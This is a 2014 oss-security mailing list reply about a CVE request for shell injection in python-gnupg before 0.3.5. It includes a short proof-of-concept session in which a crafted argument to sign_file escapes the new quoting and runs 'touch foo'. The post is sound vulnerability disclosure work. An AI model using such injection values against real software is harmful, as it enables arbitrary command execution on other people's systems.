Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [<thread-prev] [thread-next>] [day] [month] [year] [list]
Date: Tue, 4 Feb 2014 23:27:34 +1300
From: Matthew Daley <mattd@...fuzz.com>
To: oss-security@...ts.openwall.com
Subject: Re: CVE request: python-gnupg before 0.3.5 shell injection

On Tue, Feb 4, 2014 at 11:04 PM, Henri Salo <henri@...v.fi> wrote:
> On Tue, Feb 04, 2014 at 10:35:46AM +0100, Hanno Böck wrote:
>> python-gnupg 0.3.5 lists in the changelog:
>> "Added improved shell quoting to guard against shell injection."
>>
>> Sounds like a severe security issue, but further info is lacking.
>
> Diff attached. New function shell_quote() seems to represent major changes to
> shell input quoting against unsafe input.
> [...]

This appears to (at least) miss escaping of backslashes:

$ ls foo
ls: cannot access foo: No such file or directory
$ python
Python 2.7.6 (default, Jan 11 2014, 14:34:26)
[GCC 4.8.2] on linux2
Type "help", "copyright", "credits" or "license" for more information.
>>> import gnupg
>>> gnupg.GPG().sign_file(open("/dev/null"), "'\\\"; touch foo #'")
<gnupg.Sign object at 0x7fb3dbfad7d0>
>>>
$ ls foo
foo

- Matthew

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ